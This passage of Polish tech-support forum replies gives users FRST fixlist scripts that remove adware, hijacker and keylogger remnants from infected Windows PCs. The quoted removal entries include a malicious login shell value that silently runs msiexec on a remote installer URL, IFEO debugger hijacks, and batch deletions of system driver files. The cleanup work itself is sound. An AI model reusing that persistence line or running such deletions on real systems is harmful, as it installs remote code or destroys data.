Onaczenie LEGO Batman 3 Beyond Gotham version 1.0 znacznikiem "UWAGA" to fałszywy alarm. Poprawki: 1. W Google Chrome odinstaluj rozszerzenie Chrome Cleaner Pro. To mocno podejrzane rozszerzenie, które zostało zainstalowane tutaj definitywnie z zewnętrznego instalatora a nie bezpośrednio via Chrome Web Store (instalator na poziomie rejestru) i w międzyczasie instalator w rejestrze przeładował to rozszerzenie. Poza tym, AdwCleaner wykrywa jego identyfikator. 2. Usunięcie wpisu "PUP" od paczki montującej Bing Microsoftu i kilku pustych wpisów. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: MSCONFIG\Services: AdvancedSystemCareService9 => 2 MSCONFIG\Services: LiveUpdateSvc => 2 MSCONFIG\Services: MozillaMaintenance => 3 MSCONFIG\Services: Steam Client Service => 3 HKLM\...\StartupApproved\StartupFolder: => "fcbd.bat" HKLM\...\StartupApproved\Run: => "NvBackend" HKLM\...\StartupApproved\Run32: => "AVG_UI" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "BingSvc" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "DriverMax_RESTART" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "EvolveClient" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "DAEMON Tools Lite Automount" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "EADM" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "ALLPlayer WiFi Remote" HKU\S-1-5-18\...\Run: [script_fcbd] => "F:\Origin Gry\Far Cry 3 Blood Dragon\fcbd.bat" HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia Task: {493BB10B-9485-47C0-8812-1BB126C609F5} - System32\Tasks\ASC9_SkipUac_tom615 => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe Task: {7CAACDB1-BB7D-4F58-9581-9A0F25E47FF0} - System32\Tasks\ASC9_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChromeSp.crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx DeleteKey: HKLM\SOFTWARE\Classes\Interface\{3bbe95d4-c53f-11d1-b3a2-00a0c9083365} Folder: C:\ProgramData\SWCUTemp C:\ProgramData\SWCUTemp C:\Users\tom615\AppData\Local\Microsoft\BingSvc Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. Żaden z przetworzonych wpisów nie miał związku z przeglądarką Opera. Jeśli problem nadal występuje i tylko w tej przeglądarce (z wyłączeniem Edge, Chrome i Internet Explorer), prawdopodobnie problemem jest jakiś zainfekowany element w Operze, np. któreś z zainstalowanych rozszerzeń ma wstawiony szkodliwy skrypt (niewykrywalny na poziomie raportów FRST). Teoretycznie nie ma tu nic podejrzanego: Opera: ======= OPR StartupUrls: OPR Extension: (AdBlock) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\aobdicepooefnbaeokijohmhjlleamfj [2016-05-16] OPR Extension: (Ghostery) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\bbkekonodcdmedgffkkbgmnnekbainbg [2017-06-02] OPR Extension: (uBlock Origin) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2017-05-17] OPR Extension: (Translator) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\cnbpedcoekjafichoehopgaaldogogch [2016-12-14] OPR Extension: (Avast Online Security) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\daanglpcpkjjlkhcbladppjphglbigam [2017-06-01] OPR Extension: (Tampermonkey) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-06-01] OPR Extension: (HTTPS Everywhere) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\edaplhobcmdaneconioghljnnopmkhgm [2017-06-06] OPR Extension: (Free Flash, Unity3D and html5 games) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\egjicgmgibgofmekojoaaddjkagfajjh [2016-06-21] OPR Extension: (Download Chrome Extension) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\kipjbhgniklcnglfaldilecjomjaddfi [2017-02-10] OPR Extension: (Force Download) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\klahcccondnnonafcbcdgbahphglbjjg [2016-08-08] OPR Extension: (Dr.Web Link Checker) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\kokchgogfgeiahpenhpekopebfikfhil [2016-04-30] OPR Extension: (Pogoda) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\lnejmennopimdkhecilfhkmmjolebocd [2017-03-28] Skopiuj folder C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable, spakuj do ZIP, shostuj gdzieś i podaj link do paczki.

Temat przenoszę do działu Windows. Problemy nie wyglądają na pochodną infekcji, brak aktywnych obiektów adware/malware, tylko drobne szczątki które nie mają wpływu na opisywane objawy. vs. Dziennik System: ============= Error: (06/06/2017 03:21:08 PM) (Source: BugCheck) (EventID: 1001) (User: ) Description: Nastąpił ponowny rozruch komputera po operacji wykrywania błędów. Wyniki tej operacji były następujące: 0x000000d1 (0x0000000000000000, 0x0000000000000002, 0x0000000000000000, 0xfffff8800205ce00). Zrzut zapisano w: C:\Windows\MEMORY.DMP. Identyfikator raportu: 060617-27968-01. Error: (06/06/2017 03:21:05 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: Poprzednie zamknięcie systemu przy 23:41:46 na ‎2017-‎06-‎05 było nieoczekiwane. Dostarcz pliki DMP: KLIK (punkt 5). Natomiast ja tu nie widzę wielu doinstalowanych wtórnie programów, z wyłączeniem aplikacji preintegrowanych przez producenta. Z raportów nic też konkretnego nie wynika. Na razie zadaję tylko podstawowe czynności: 1. Odinstaluj zbędne programy zainstalowane w charakterze sponsorów oraz starą przeglądarkę: AVG Web TuneUp, Intel Security True Key, McAfee Security Scan Plus, Mozilla Firefox 38.0.1 (x86 en-US), Mozilla Maintenance Service. Nie są także potrzebne wtyczki Flash Adobe Flash Player 25 NPAPI, Adobe Flash Player 25 PPAPI - Chrome ma wbudowany natywny Flash. Zakładam, że Firefox zostanie odinstalowany, gdyż skrypt w punkcie 2 usunie pozostałości Firefox. 2. W spoilerze doczyszczanie wpisów szczątkowych: 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

Do usunięcia szczątki po Baidu. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: ShellIconOverlayIdentifiers: [baiduAntivirusIconLock] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CC} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.148966.0\BavShx64.dll -> Brak pliku Task: {3C078223-94F7-447C-A454-2CE0D63E53EF} - System32\Tasks\060184C3-9766-46a0-B258-F4518A0B2633 => Cscript.exe "C:\ProgramData\Baidu Security\Duplicaterecord.js" RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\Baidu Security RemoveDirectory: C:\ProgramData\Baidu RemoveDirectory: C:\ProgramData\Baidu Security RemoveDirectory: C:\Users\Gibon\AppData\LocalLow\BAVData RemoveDirectory: C:\Users\Gibon\AppData\Roaming\Baidu RemoveDirectory: C:\Users\Gibon\AppData\Roaming\BavMini RemoveDirectory: C:\Users\Gibon\Downloads\FRST-OlderVersion RemoveDirectory: C:\Users\Public\Documents\Baidu StartBatch: del /q C:\Users\Gibon\Downloads\cert.reg del /q C:\Windows\system32\bdhookx64.dll del /q C:\Windows\system32\BdSandboxDll64.dll del /q C:\Windows\system32\Drivers\Bprotect.sys.1496687251 del /q C:\Windows\system32\Drivers\Bfilter.sys.1496687249 del /q C:\Windows\system32\Drivers\Bfmon.sys.1496687249 del /q C:\Windows\system32\Drivers\bnbasex64.sys.1496687250 del /q C:\Windows\system32\Drivers\bndef64.sys.1496687251 del /q C:\Windows\SysWOW64\bdhookx86.dll del /q C:\Windows\SysWOW64\BdSandboxDll32.dll EndBatch: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. I podsumuj jak działa obecnie system.

Temat przenoszę do działu Windows. W raportach nie ma żadnych oznak aktywnej infekcji. Są tylko nieaktywne (puste) szczątki po Ardamax Keylogger, który jak podejrzewam był instalowany celowo. Usunięcie tych odpadków nie przyniesie żadnej poprawy w wydajności. W spoilerze skrypt usuwający owe szczątki oraz wyłączający usługę aktualizatora Huawei Internet Manager produkującą błędy: Dziennik System: ============= Error: (06/05/2017 04:26:24 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Internet Manager. RunOuc z powodu następującego błędu: Usługa nie odpowiada na sygnał uruchomienia lub sygnał sterujący w oczekiwanym czasie. Error: (06/05/2017 04:26:24 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Internet Manager. RunOuc. Z raportów nic też nie wynika, żadnych wyraźnych tropów co może powodować duże spowolnienie. Jedyne co mi się rzuca w oczy to Avast (jednak co dopiero zainstalowany) oraz Secure Folders. Ten drugi to porzucony i nierozwijany soft, bez oficjalnej kompatybilności z Windows 10, więc stabilność sterownika programu na tej platformie jest pod znakiem zapytania: R1 pnpeap; C:\WINDOWS\system32\drivers\pnpeap.sys [45736 2017-05-03] (Promosoft Software Limited)

Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj adware: AlphaGo, amuleC, WinSnare. Jeśli będzie jakiś problem z deinstalacją, kontynuuj i przejdź do działań wyliczonych poniżej. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-17] (TODO: ) [brak podpisu cyfrowego] S2 CSHMDR; C:\Users\MI\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 CWASRE; C:\Users\MI\AppData\Local\CWASRE\Snare.dll [828416 2017-05-17] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [110592 2017-05-23] () [brak podpisu cyfrowego] R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [brak podpisu cyfrowego] R2 Kitty; C:\Users\MI\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [brak podpisu cyfrowego] R2 MSLN; C:\ProgramData\Microsoft\Blend\14.0\1033\ResourceCache.dll [399360 2017-01-04] () [brak podpisu cyfrowego] S2 NPASRE; C:\Users\MI\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 snare; C:\Users\MI\AppData\Local\snare\Snare.dll [898048 2017-05-25] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 terana; C:\Users\MI\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 VNASRE; C:\Users\MI\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 WANARE; C:\Users\MI\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 WinAppSvr; C:\ProgramData\Microsoft\AppV\sym\dbg.dll [109056 2017-05-12] (TODO: ) [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\MI\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-17] () [brak podpisu cyfrowego] S0 Avguniva; system32\DRIVERS\avguniva.sys [X] U3 idsvc; Brak ImagePath S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] S1 mvlwfqjo; \??\C:\WINDOWS\system32\drivers\mvlwfqjo.sys [X] U2 WinSnare; Brak ImagePath HKU\S-1-5-21-570807183-2887973835-1248124564-1000\...\Run: [background_fault] => C:\Users\MI\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) HKU\S-1-5-21-570807183-2887973835-1248124564-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.ltdmsjq.com/?data=zDlkMj8dMdk4FdkdRkZYF8M1FdExOYU2NTNWRTkdMWU2MUJSRH== /q IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe GroupPolicy: Ograniczenia Task: {011BBC71-739E-4862-B5F3-2F2DFFE57E7B} - System32\Tasks\NosemayUpdateTaskMachineUA => C:\Program Files (x86)\Nosemay\Update\NosemayUpdate.exe Task: {017D2570-02DE-476E-A42B-37771FF2B192} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku Task: {01C995FF-D178-4E7B-AC4A-9E950006A207} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {0837D897-84CB-4E30-A8DD-807937A81DFC} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => %SystemRoot%\ehome\mcupdate.exe Task: {0F1FC558-90E6-41AA-8D37-4FBE69053762} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe Task: {148318FC-5974-4508-A415-B3AFD16E5DDB} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => %SystemRoot%\ehome\ehPrivJob.exe Task: {19E783A3-8AEE-4CB8-8B5D-F114E00BAB33} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => %SystemRoot%\ehome\mcupdate.exe Task: {1F96044A-9E15-42EC-886D-441BAFAFECED} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {29308477-8F7E-4D4F-92D5-F1534E61B6F5} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe Task: {30212503-2AEC-4B16-848E-334D882D6A53} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: {3C9616B2-742C-4820-AFAE-F3D2459E9677} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe Task: {3D966D87-5FE5-4FBC-8E90-DB0F48E454DB} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe Task: {3E3E65EA-6693-4ACC-947D-206853F50D65} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => %SystemRoot%\ehome\ehPrivJob.exe Task: {42145BE5-4059-431F-919A-1A381C5966DE} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {4CCE8DE9-7207-4EA6-8407-BDF2684DFE81} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {6FECF9BE-AED8-4627-80ED-91FF5361960F} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => %SystemRoot%\ehome\ehPrivJob.exe Task: {773492A6-4F08-4DAF-9C1B-778BC17ACAED} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => %SystemRoot%\ehome\ehPrivJob.exe Task: {78588675-6CF3-4E50-B5B1-1EC34EAA2F6B} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => %SystemRoot%\ehome\ehPrivJob.exe Task: {7DDF9673-8D0B-4652-B795-1BEAD1206B65} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => %SystemRoot%\ehome\ehPrivJob.exe Task: {8AB44150-345F-44E5-ABC3-8235DE5E1DE5} - System32\Tasks\NosemayUpdateTaskMachineCore => C:\Program Files (x86)\Nosemay\Update\NosemayUpdate.exe Task: {94C0CB8F-6430-43CD-8CE0-B5A9EDCB5063} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {9521AF5F-3377-4704-92B9-8835155CFFE6} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1 Task: {A8561EA2-FFCC-479F-A8F3-0D1E90CA4B10} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\MI\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe Task: {AA921623-B84A-4EC8-A6DA-5D46323FC6D9} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => %SystemRoot%\ehome\ehPrivJob.exe Task: {B201CD42-5792-43BE-97D6-74AB486671CA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {B40C4875-485A-4120-A48B-4E4E32ED8612} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku Task: {C778374C-94FE-41B0-B705-5FC952201AC0} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe Task: {D9B027D3-E4DD-42DB-B655-6506173D10B0} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku Task: {DB65ACDE-0DF5-4CB0-9415-9658810D1A58} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () Task: {DC3DCC2C-6D40-43C1-9BE5-076B5E2044B0} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {DD548504-31EE-43FF-A573-1E9BCB56DC76} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe Task: {E899BB27-DB02-4C11-A531-A261D6E8D363} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku Task: {E959E007-A71C-4952-8EA8-22DE146D6227} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => %SystemRoot%\ehome\ehPrivJob.exe Task: {F0496437-71B1-4E96-9E9C-3BC2F52CDE46} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {F52B9841-800B-4073-B588-B3A2B9DAFB2E} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {FA831EE3-8E47-422C-913B-86BF798418B5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {FACB8164-0888-403B-B4E6-7F59329EA90F} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => %SystemRoot%\ehome\ehPrivJob.exe Task: {FBC8485F-A585-489F-8E2C-C65FEABC1BEF} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {FFEE4F98-789F-4BC5-9EBF-91D4AC658C46} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C&q={searchTerms} HKU\S-1-5-21-570807183-2887973835-1248124564-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C&q={searchTerms} HKU\S-1-5-21-570807183-2887973835-1248124564-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C HKU\S-1-5-21-570807183-2887973835-1248124564-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C HKU\S-1-5-21-570807183-2887973835-1248124564-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C&q={searchTerms} SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 SearchScopes: HKU\S-1-5-21-570807183-2887973835-1248124564-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 SearchScopes: HKU\S-1-5-21-570807183-2887973835-1248124564-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 StartMenuInternet: IEXPLORE.EXE - c:\program files\internet explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1496219886&z=05b1940ea6a6615f7e82dc7gez4tfqcoegft1b8bfq&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C ShortcutWithArgument: C:\Users\MI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494843707&z=1535c9995935171be08905dg8z1tbzdb4z6c6mdecw&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C ShortcutWithArgument: C:\Users\MI\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C Edge HomeButtonPage: HKU\S-1-5-21-570807183-2887973835-1248124564-1000 -> hxxp://www.nuesearch.com/?type=hp&ts=1473244319&z=1fd95696a597e865f3e8157gdzem5c7o7z0z8c4gab&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C Edge Session Restore: HKU\S-1-5-21-570807183-2887973835-1248124564-1000 -> [funkcja włączona] HKU\S-1-5-21-570807183-2887973835-1248124564-1000\...\ChromeHTML: -> C:\Program Files (x86)\Eggper\Application\chrome.exe (Google Inc.) HKU\S-1-5-21-570807183-2887973835-1248124564-1000\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eggper\Application\chrome.exe (Google Inc.) Reg: reg export "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy" C:\Users\MI\Desktop\edge.reg DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins DeleteKey: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OpenSearch DeleteValue: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy|ProtectedHomepages DeleteValue: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy|ProtectedSearchScopes C:\Program Files (x86)\GUT5E88.tmp C:\Program Files (x86)\metadata C:\Program Files (x86)\settings.dat C:\Program Files (x86)\AlphaGo C:\Program Files (x86)\Default Company Name C:\Program Files (x86)\Eggper C:\Program Files (x86)\Firefox C:\Program Files (x86)\Google C:\Program Files (x86)\MIO C:\Program Files (x86)\Nosemay C:\ProgramData\BIT C:\ProgramData\Microsoft\AppV C:\ProgramData\Microsoft\Blend C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795 C:\Users\MI\AppData\Local\background_fault C:\Users\MI\AppData\Local\CSHMDR C:\Users\MI\AppData\Local\CWASRE C:\Users\MI\AppData\Local\Eggper C:\Users\MI\AppData\Local\Google C:\Users\MI\AppData\Local\Kitty C:\Users\MI\AppData\Local\NPASRE C:\Users\MI\AppData\Local\SNARE C:\Users\MI\AppData\Local\terana C:\Users\MI\AppData\Local\VNASRE C:\Users\MI\AppData\LocalLow\Mozilla C:\Users\MI\AppData\Roaming\ICSW_1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1ItJ1V0O1E1P1C1T1V0I0C.txt C:\Users\MI\AppData\Roaming\Firefox C:\Users\MI\AppData\Roaming\WinSAPSvc C:\Users\MI\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\MI\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\MI\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\MI\Desktop\BigFarm.lnk C:\Users\MI\Desktop\big_bang_empire.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Public\Documents\report.dat C:\Users\Public\Documents\temp.dat C:\WINDOWS\ehome C:\WINDOWS\psgo C:\WINDOWS\system32\Drivers\aatkrykk.sys C:\WINDOWS\System32\Tasks\Microsoft\Windows\Media Center 